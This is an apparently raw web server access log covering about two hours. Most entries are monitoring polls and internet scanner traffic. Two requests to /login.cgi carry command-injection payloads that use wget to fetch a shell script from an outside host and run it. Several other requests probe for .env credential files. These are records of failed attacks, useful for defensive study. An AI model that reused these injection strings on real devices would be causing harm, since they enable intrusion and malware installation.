185.36.81.33 - - [03/Oct/2023:22:27:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Oct/2023:22:28:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:29:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:30:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.159.153.74 - - [03/Oct/2023:22:31:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2023:22:31:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.159.153.74 - - [03/Oct/2023:22:31:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2023:22:32:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:33:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.159.153.74 - - [03/Oct/2023:22:33:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
62.138.2.214 - - [03/Oct/2023:22:34:21 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.2.214 - - [03/Oct/2023:22:34:21 +0200] "GET /sitemap.xml HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
212.91.246.72 - - [03/Oct/2023:22:34:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:35:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:36:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:37:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:38:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:39:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:40:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:41:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:42:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.159.153.74 - - [03/Oct/2023:22:42:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
137.184.255.53 - - [03/Oct/2023:22:43:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
137.184.255.53 - - [03/Oct/2023:22:43:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
137.184.255.53 - - [03/Oct/2023:22:43:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
137.184.255.53 - - [03/Oct/2023:22:43:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
137.184.255.53 - - [03/Oct/2023:22:43:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2023:22:43:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
137.184.255.53 - - [03/Oct/2023:22:43:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.235.24.69 - - [03/Oct/2023:22:43:50 +0200] "\x16\x03\x01" 501 318 "-" "-"
137.184.255.53 - - [03/Oct/2023:22:44:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
137.184.255.53 - - [03/Oct/2023:22:44:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
137.184.255.53 - - [03/Oct/2023:22:44:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
137.184.255.53 - - [03/Oct/2023:22:44:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
209.159.153.74 - - [03/Oct/2023:22:44:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2023:22:44:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:45:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
146.70.192.180 - - [03/Oct/2023:22:46:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
146.70.192.180 - - [03/Oct/2023:22:46:04 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
212.91.246.72 - - [03/Oct/2023:22:46:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.159.153.74 - - [03/Oct/2023:22:47:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2023:22:47:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:48:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:49:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.159.153.74 - - [03/Oct/2023:22:50:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2023:22:50:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:51:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:52:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:53:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:54:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:55:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:56:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:57:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:22:58:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.254.59.113 - - [03/Oct/2023:22:58:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
212.91.246.72 - - [03/Oct/2023:22:59:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.159.153.74 - - [03/Oct/2023:23:00:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
205.210.31.28 - - [03/Oct/2023:23:00:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Oct/2023:23:00:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.247 - - [03/Oct/2023:23:01:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [03/Oct/2023:23:01:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:02:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:03:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:04:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:05:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:06:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:07:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:08:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:09:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
101.36.107.138 - - [03/Oct/2023:23:10:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
101.36.107.138 - - [03/Oct/2023:23:10:35 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
212.91.246.72 - - [03/Oct/2023:23:10:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
218.145.61.20 - - [03/Oct/2023:23:11:04 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.91.223.136/reallynightmare.sh?dlink%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [03/Oct/2023:23:11:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:12:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
101.36.117.219 - - [03/Oct/2023:23:12:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
101.36.117.219 - - [03/Oct/2023:23:12:58 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
212.91.246.72 - - [03/Oct/2023:23:13:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:14:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:15:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:16:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:17:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:18:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:19:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:20:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:21:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
101.36.117.219 - - [03/Oct/2023:23:22:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
101.36.117.219 - - [03/Oct/2023:23:22:35 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
212.91.246.72 - - [03/Oct/2023:23:22:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.138 - - [03/Oct/2023:23:22:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Oct/2023:23:23:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:24:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:25:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:26:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:27:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:28:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:29:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:30:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:31:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:32:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.180.49.230 - - [03/Oct/2023:23:33:11 +0200] "GET /login.cgi?cli=aa%20aa%27cd%20/tmp;wget%20http://194.180.48.100/l.sh;chmod%20777%20l.sh%20sh%20/tmp/%27$l.sh HTTP/1.1" 400 329 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
109.107.166.15 - - [03/Oct/2023:23:33:17 +0200] "\x03" 501 316 "-" "-"
109.107.166.15 - - [03/Oct/2023:23:33:21 +0200] "\x03" 501 316 "-" "-"
109.107.166.15 - - [03/Oct/2023:23:33:23 +0200] "\x03" 501 316 "-" "-"
109.107.166.15 - - [03/Oct/2023:23:33:30 +0200] "\x03" 501 316 "-" "-"
109.107.166.15 - - [03/Oct/2023:23:33:31 +0200] "\x03" 501 316 "-" "-"
66.240.236.116 - - [03/Oct/2023:23:33:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
109.107.166.15 - - [03/Oct/2023:23:33:34 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [03/Oct/2023:23:33:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.240.236.116 - - [03/Oct/2023:23:34:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
66.240.236.116 - - [03/Oct/2023:23:34:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
66.240.236.116 - - [03/Oct/2023:23:34:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2023:23:34:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.193.45.5 - - [03/Oct/2023:23:35:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
118.193.45.5 - - [03/Oct/2023:23:35:03 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
212.91.246.72 - - [03/Oct/2023:23:35:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:36:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:37:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:38:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:39:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:40:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:41:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.174 - - [03/Oct/2023:23:42:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [03/Oct/2023:23:42:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:43:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
58.108.49.241 - - [03/Oct/2023:23:43:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [03/Oct/2023:23:44:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:45:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:46:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:47:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:48:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:49:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.43.33.218 - - [03/Oct/2023:23:50:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
212.91.246.72 - - [03/Oct/2023:23:50:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.32.197.90 - - [03/Oct/2023:23:51:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
212.91.246.72 - - [03/Oct/2023:23:51:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
213.32.39.44 - - [03/Oct/2023:23:52:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
212.91.246.72 - - [03/Oct/2023:23:52:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:53:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:54:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:55:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:56:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:57:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:58:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2023:23:59:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.166 - - [04/Oct/2023:00:03:43 +0200] "\x16\x03\x01" 501 318 "-" "-"
34.244.42.63 - - [04/Oct/2023:00:07:59 +0200] "HEAD / HTTP/1.1" 200 - "https://www.netcraft.com/survey/" "Mozilla/4.0 (compatible; Netcraft Web Server Survey)"
167.94.138.35 - - [04/Oct/2023:00:19:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.35 - - [04/Oct/2023:00:19:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.35 - - [04/Oct/2023:00:19:10 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.35 - - [04/Oct/2023:00:19:11 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
95.38.183.43 - - [04/Oct/2023:00:23:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:54 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:54 +0200] "GET /conf/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:54 +0200] "GET /wp-content/.env HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:54 +0200] "GET /wp-admin/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:54 +0200] "GET /library/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:54 +0200] "GET /new/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:54 +0200] "GET /old/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
92.42.111.141 - - [04/Oct/2023:00:23:54 +0200] "GET /local/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
